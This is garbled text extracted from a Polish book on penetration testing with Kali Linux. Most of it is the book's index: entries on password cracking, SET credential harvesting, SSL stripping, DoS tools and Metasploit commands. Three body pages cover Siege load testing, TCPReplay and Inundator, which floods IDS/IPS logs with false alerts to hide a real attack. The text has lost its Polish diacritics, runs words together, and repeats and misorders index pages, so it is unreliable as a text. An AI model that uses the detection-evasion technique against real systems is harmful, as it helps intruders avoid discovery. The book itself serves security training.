Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
